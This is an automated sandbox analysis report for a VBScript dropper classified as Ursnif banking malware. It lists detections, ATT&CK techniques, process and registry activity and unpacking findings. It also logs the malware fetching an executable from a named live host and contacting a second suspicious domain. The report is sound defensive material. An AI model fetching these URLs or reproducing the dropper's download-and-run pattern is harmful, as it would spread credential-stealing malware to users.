
Analysis Report: Nuovo documento 1.vbs

Overview

General Information

Joe Sandbox Version: 28.0.0 Lapis Lazuli
Analysis ID: 222479
Start date: 14.04.2020
Start time: 19:50:05
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 5m 5s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: Nuovo documento 1.vbs
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit (version 1803) with Office 2016, Adobe Reader DC 19, Chrome 70, Firefox 63, Java 8.171, Flash 30.0.0.113
Number of new started processes analysed: 12
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winVBS@7/13@5/2
EGA Information:
  • Successful, ratio: 100%
HDC Information:
  • Successful, ratio: 7.9% (good quality ratio 7.9%)
  • Quality average: 88.6%
  • Quality standard deviation: 20.2%
HCA Information:
  • Successful, ratio: 55%
  • Number of executed functions: 14
  • Number of non-executed functions: 30
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Start process as user (medium integrity level)
  • Found application associated with file extension: .vbs
Warnings:
  • Exclude process from analysis (whitelisted): MpCmdRun.exe, taskhostw.exe, dllhost.exe, ielowutil.exe, WMIADAP.exe, conhost.exe, WmiPrvSE.exe
  • Excluded IPs from analysis (whitelisted): 2.20.160.163, 8.241.123.254, 8.253.207.120, 8.248.131.254, 67.27.157.126, 67.27.159.254, 104.82.137.153, 23.39.80.147
  • Excluded domains from analysis (whitelisted): fs.microsoft.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, site-cdn.onenote.net.edgekey.net, e11290.dspg.akamaiedge.net, e5684.g.akamaiedge.net, go.microsoft.com, audownload.windowsupdate.nsatc.net, go.microsoft.com.edgekey.net, auto.au.download.windowsupdate.com.c.footprint.net, prod.fs.microsoft.com.akadns.net
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.

Detection

Strategy | Score | Range | Reporting | Whitelisted | Threat | Detection
Threshold | 100 | 0 - 100 | | false | Ursnif | malicious

Confidence

Strategy | Score | Range | Further Analysis Required? | Confidence
Threshold | 5 | 0 - 5 | false |


Classification Spiderchart

Analysis Advice

Uses HTTPS for network communication, use the 'Proxy HTTPS (port 443) to read its encrypted data' cookbook for further analysis



Mitre Att&ck Matrix

Initial Access: Valid Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise, Exploit Public-Facing Application, Spearphishing Link, Spearphishing Attachment, Spearphishing via Service, Supply Chain Compromise, Trusted Relationship
Execution: Windows Management Instrumentation21, Scheduled Task1, Scripting21, Execution through API2, Exploitation for Client Execution1, Graphical User Interface, Scripting, Third-party Software, Rundll32, PowerShell
Persistence: Scheduled Task1, Port Monitors, Accessibility Features, System Firmware, Shortcut Modification, Modify Existing Service, Path Interception, Logon Scripts, DLL Search Order Hijacking, Change Default File Association
Privilege Escalation: Process Injection12, Scheduled Task1, Path Interception, DLL Search Order Hijacking, File System Permissions Weakness, New Service, Scheduled Task, Process Injection, Service Registry Permissions Weakness, Exploitation for Privilege Escalation
Defense Evasion: Masquerading1, Software Packing23, Virtualization/Sandbox Evasion1, Process Injection12, Scripting21, Obfuscated Files or Information3, Software Packing, Indicator Blocking, Process Injection, Scripting
Credential Access: Credential Dumping, Network Sniffing, Input Capture, Credentials in Files, Account Manipulation, Brute Force, Two-Factor Authentication Interception, Bash History, Input Prompt, Keychain
Discovery: System Time Discovery1, Query Registry1, Virtualization/Sandbox Evasion1, Process Discovery1, Account Discovery1, System Owner/User Discovery1, Security Software Discovery121, Remote System Discovery1, File and Directory Discovery1, System Information Discovery14
Lateral Movement: Remote File Copy12, Remote Services, Windows Remote Management, Logon Scripts, Shared Webroot, Third-party Software, Pass the Hash, Remote Desktop Protocol, Windows Admin Shares, Taint Shared Content
Collection: Data from Local System, Data from Removable Media, Data from Network Shared Drive, Input Capture, Data Staged, Screen Capture, Email Collection, Clipboard Data, Automated Collection, Audio Capture
Exfiltration: Data Encrypted1, Exfiltration Over Other Network Medium, Automated Exfiltration, Data Encrypted, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over Command and Control Channel, Exfiltration Over Alternative Protocol, Exfiltration Over Physical Medium, Commonly Used Port
Command and Control: Standard Cryptographic Protocol12, Remote File Copy12, Standard Non-Application Layer Protocol2, Standard Application Layer Protocol13, Standard Cryptographic Protocol, Commonly Used Port, Uncommonly Used Port, Standard Application Layer Protocol, Multilayer Encryption, Connection Proxy
Network Effects: Eavesdrop on Insecure Network Communication, Exploit SS7 to Redirect Phone Calls/SMS, Exploit SS7 to Track Device Location, SIM Card Swap, Manipulate Device Communication, Jamming or Denial of Service, Rogue Wi-Fi Access Points, Downgrade to Insecure Protocols, Rogue Cellular Base Station
Remote Service Effects: Remotely Track Device Without Authorization, Remotely Wipe Data Without Authorization, Obtain Device Cloud Backups
Impact: Modify System Partition, Device Lockout, Delete Device Data, Premium SMS Toll Fraud, Manipulate App Store Rankings or Ratings, Abuse Accessibility Features, Data Encrypted for Impact, Generate Fraudulent Advertising Revenue, Data Destruction, Data Encrypted for Impact

Signature Overview



AV Detection:

Multi AV Scanner detection for domain / URL
Source: http://primecontentstudios.com/pagigpy75.php?uid= | Virustotal: Detection: 7%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe | Virustotal: Detection: 35%
Multi AV Scanner detection for submitted file
Source: Nuovo documento 1.vbs | Virustotal: Detection: 8%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe | Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 4.2.PaintHelper.exe.1000000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen

Spreading:

Creates COM task schedule object (often to register a task for autostart)
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs

Networking:

Downloads executable code via HTTP
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 14 Apr 2020 17:51:21 GMTServer: Apache/2.4.18 (Ubuntu)Content-Length: 224928Content-Disposition: attachment; filename=2_exx.binKeep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 da 47 9b 3d 9e 26 f5 6e 9e 26 f5 6e 9e 26 f5 6e b9 e0 88 6e 8f 26 f5 6e b9 e0 9b 6e 87 26 f5 6e b9 e0 98 6e d6 26 f5 6e 97 5e 66 6e 95 26 f5 6e 9e 26 f4 6e ed 26 f5 6e b9 e0 87 6e 9f 26 f5 6e b9 e0 89 6e 9f 26 f5 6e b9 e0 8d 6e 9f 26 f5 6e 52 69 63 68 9e 26 f5 6e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 c3 9d 1f 46 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 08 00 00 a0 01 00 00 a0 01 00 00 00 00 00 7f 37 00 00 00 10 00 00 00 b0 01 00 00 00 00 01 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 04 00 00 10 00 00 1e ae 03 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 bc 26 02 00 78 00 00 00 00 10 04 00 f6 6c 00 00 00 00 00 00 00 00 00 00 00 50 03 00 a0 1e 00 00 00 00 00 00 00 00 00 00 e0 b1 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 23 02 00 40 00 00 00 00 00 00 00 00 00 00 00 00 b0 01 00 a0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 44 91 01 00 00 10 00 00 00 a0 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 b2 80 00 00 00 b0 01 00 00 90 00 00 00 b0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 
00 24 c7 01 00 00 40 02 00 00 a0 00 00 00 40 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f6 6c 00 00 00 10 04 00 00 70 00 00 00 e0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Internet Provider seen in connection with other malware
Source: Joe Sandbox View | ASN Name: unknown unknown
Downloads files
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Virtualized\C
Downloads files from webservers via HTTP
Source: global traffic | HTTP traffic detected: GET /pagigpy75.php?uid= HTTP/1.1 | Connection: Keep-Alive | Accept: */* | Accept-Language: en-US | User-Agent: SanAntonio | Host: primecontentstudios.com
Performs DNS lookups
Source: unknown | DNS traffic detected: queries for: primecontentstudios.com
Urls found in memory or binary data
Source: wscript.exe, 00000000.00000003.666214385.0000023B90BAE000.00000004.00000001.sdmp, PaintHelper.exe.0.dr | String found in binary or memory: http://crl.sectigo.com/COMODOTimeStampingCA_2.crl0r
Source: wscript.exe, 00000000.00000003.667075961.0000023B90C27000.00000004.00000001.sdmp, PaintHelper.exe.0.dr | String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
Source: wscript.exe, 00000000.00000003.666214385.0000023B90BAE000.00000004.00000001.sdmp, PaintHelper.exe.0.dr | String found in binary or memory: http://crt.sectigo.com/COMODOTimeStampingCA_2.crt0#
Source: wscript.exe, 00000000.00000003.667075961.0000023B90C27000.00000004.00000001.sdmp, PaintHelper.exe.0.dr | String found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
Source: wscript.exe, 00000000.00000003.667075961.0000023B90C27000.00000004.00000001.sdmp, PaintHelper.exe.0.dr | String found in binary or memory: http://ocsp.sectigo.com0
Source: wscript.exe, 00000000.00000002.673338132.0000023B90B85000.00000004.00000001.sdmp | String found in binary or memory: http://primecontentstudios.com/
Source: wscript.exe, 00000000.00000002.670523970.0000023B8E9BE000.00000004.00000001.sdmp | String found in binary or memory: http://primecontentstudios.com/pagigpy75.php?uid=
Source: wscript.exe, 00000000.00000002.670330001.0000023B8E927000.00000004.00000001.sdmp | String found in binary or memory: http://primecontentstudios.com/pagigpy75.php?uid=._o
Source: wscript.exe, 00000000.00000002.673338132.0000023B90B85000.00000004.00000001.sdmp | String found in binary or memory: http://primecontentstudios.com/pagigpy75.php?uid==
Source: wscript.exe, 00000000.00000002.670523970.0000023B8E9BE000.00000004.00000001.sdmp | String found in binary or memory: http://primecontentstudios.com/pagigpy75.php?uid=WW
Source: wscript.exe, 00000000.00000002.670330001.0000023B8E927000.00000004.00000001.sdmp | String found in binary or memory: http://primecontentstudios.com/pagigpy75.php?uid=_______Set
Source: wscript.exe, 00000000.00000003.666214385.0000023B90BAE000.00000004.00000001.sdmp, PaintHelper.exe.0.dr | String found in binary or memory: https://sectigo.com/CPS0B
Source: wscript.exe, 00000000.00000003.667075961.0000023B90C27000.00000004.00000001.sdmp, PaintHelper.exe.0.dr | String found in binary or memory: https://sectigo.com/CPS0C
Source: PaintHelper.exe, 00000004.00000003.816245440.0000000003680000.00000004.00000040.sdmp, PaintHelper.exe, 00000004.00000002.948438071.0000000003680000.00000004.00000040.sdmp | String found in binary or memory: https://trattoriafiori.xyz
Source: ~DF689278BECED51105.TMP.8.dr | String found in binary or memory: https://trattoriafiori.xyz/index.htm
Source: {1E5F6928-7EC4-11EA-AAE5-44C1B3FB757B}.dat.8.dr | String found in binary or memory: https://trattoriafiori.xyz/index.htm.xyz/index.htm
Source: PaintHelper.exe, 00000004.00000002.948438071.0000000003680000.00000004.00000040.sdmp | String found in binary or memory: https://trattoriafiori.xyz/index.htmL2
Source: {1E5F6928-7EC4-11EA-AAE5-44C1B3FB757B}.dat.8.dr | String found in binary or memory: https://trattoriafiori.xyz/index.htmRoot
Uses HTTPS
Source: unknown | Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49717 -> 443

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif
Source: Yara match | File source: 00000004.00000003.816245440.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.813307095.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.948438071.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.809341649.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.808887290.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.811481573.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.813893691.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.815804460.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.810469443.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.814479003.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.815608534.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.815133508.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.812630162.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.810128066.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.812144693.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.816907657.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.814943723.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.815313978.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.811173075.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.816721090.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.809743965.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.815968516.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.814703114.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.811803755.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.816108974.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.810838452.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.812995480.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.816495823.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.814184398.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.808312503.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.816635881.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.816822684.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.813595381.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: PaintHelper.exe PID: 4192, type: MEMORY

E-Banking Fraud:

Yara detected Ursnif
Source: Yara match | the same 33 PaintHelper.exe memory dumps and the PaintHelper.exe PID 4192 process memory space listed under "Key, Mouse, Clipboard, Microphone and Screen Capturing" above

System Summary:

Writes or reads registry keys via WMI
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Writes registry values via WMI
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Contains functionality to call native functions
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe | Code function: 4_2_01001EB5 NtQueryVirtualMemory
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe | Code function: 4_2_001E4498 NtOpenProcessToken,memcpy,NtClose,RtlNtStatusToDosError
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe | Code function: 4_2_001E12AF RtlInitUnicodeString,NtCreateKey
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe | Code function: 4_2_001E1CCC RtlInitUnicodeString,NtSetValueKey,NtDeleteValueKey,NtClose,RtlNtStatusToDosError
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe | Code function: 4_2_001E1D96 memcpy,memcpy,lstrcatW,CreateEventA,_wcsupr,lstrlenW,NtQueryInformationProcess,CloseHandle
Detected potential crypto function
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe | Code function: 4_2_01001C94
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe | Code function: 4_2_001EAB9A
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe | Code function: 4_2_001EB3F0
Java / VBScript file with very long strings (likely obfuscated code)
Source: Nuovo documento 1.vbs | Initial sample: Strings found which are bigger than 50
PE file has an executable .text section which is very likely to contain packed code (zlib compression ratio < 0.3)
Source: PaintHelper.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Classification label
Source: classification engine | Classification label: mal100.troj.evad.winVBS@7/13@5/2
Creates files inside the user directory
Source: C:\Program Files\internet explorer\iexplore.exe | File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\Active
Creates temporary files
Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Local\Temp\PaintHelper.exe
Executes visual basic scripts
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\Nuovo documento 1.vbs'
Reads ini files
Source: C:\Program Files\internet explorer\iexplore.exe | File read: C:\Users\desktop.ini
Reads software policies
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Reads the hosts file
Source: C:\Windows\System32\wscript.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\wscript.exe | File read: C:\Windows\System32\drivers\etc\hosts
Sample is known by Antivirus
Source: Nuovo documento 1.vbs | Virustotal: Detection: 8%
Spawns processes
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\Nuovo documento 1.vbs'
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\PaintHelper.exe C:\Users\user\AppData\Local\Temp\PaintHelper.exe
Source: unknown | Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1720 CREDAT:9474 /prefetch:2
Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1720 CREDAT:75016 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1720 CREDAT:9474 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1720 CREDAT:75016 /prefetch:2
Uses an in-process (OLE) Automation server
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
Submission file is bigger than most known malware samples
Source: Nuovo documento 1.vbs | Static file information: File size 9193427 > 1048576
Uses new MSVCR Dlls
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe | File opened: C:\Program Files (x86)\Java\jre1.8.0_171\bin\msvcr100.dll
Binary contains paths to debug symbols
Source: Binary string: c:\alwaysNote\columnThird\glasseither\lotDetermine\RideAllow\SevenDofinish.pdb | source: wscript.exe, 00000000.00000003.667075961.0000023B90C27000.00000004.00000001.sdmp, PaintHelper.exe, 00000004.00000002.947619558.000000000101B000.00000002.00020000.sdmp, PaintHelper.exe.0.dr

Data Obfuscation:

Detected unpacking (changes PE section rights)
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe; Unpacked PE file: 4.2.PaintHelper.exe.1000000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.bss:W;.reloc:R;
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe; Unpacked PE file: 4.2.PaintHelper.exe.1000000.0.unpack
Note: the section table read from memory (.text/.rdata/.data/.bss/.reloc) no longer matches the one on disk (.text/.rdata/.data/.rsrc): a different PE has been laid over the original image at its base 0x01000000. That dump, 4.2.PaintHelper.exe.1000000.0.unpack, is the artifact to analyse statically; it is the one Avira labels TR/Crypt.ZPACK.Gen in the detection tables below.
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe; Code function: 4_2_01001A88 GetModuleHandleW,LoadLibraryW,GetProcAddress
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe; Code function: 4_2_01001C83 push ecx; ret (4_2_01001C93)
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe; Code function: 4_2_001EB3DF push ecx; ret (4_2_001EB3EF)
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe; Code function: 4_2_01013B77 push ss; iretd (4_2_01013B78)
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe; Code function: 4_2_01011D7D push edi; retf 0036h (4_2_01011DEB)
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe; Code function: 4_2_01013D8C push FFFFFFB7h; ret (4_2_01013D94)
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe; Code function: 4_2_0101179F push ebp; ret (4_2_010117A7)
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe; Code function: 4_2_010135F7 push eax; iretd (4_2_0101360F)
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe; Code function: 4_2_010106DD push 008990FFh; ret (4_2_0101068C)
Note: sequences such as push ss; iretd, push edi; retf 0036h and push FFFFFFB7h; ret are what a disassembler produces from data or misaligned bytes. They are consistent with packed content in the region but should not be read as individual, deliberate obfuscation gadgets.
Binary may include packed or encrypted code
Source: initial sample; Static PE information: section name: .text entropy: 6.96998335472
Note: ordinary compiled x86 .text sections score roughly 6 bits per byte; a value close to 7 indicates compressed or encrypted code, which matches the unpacking observed at run time.
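
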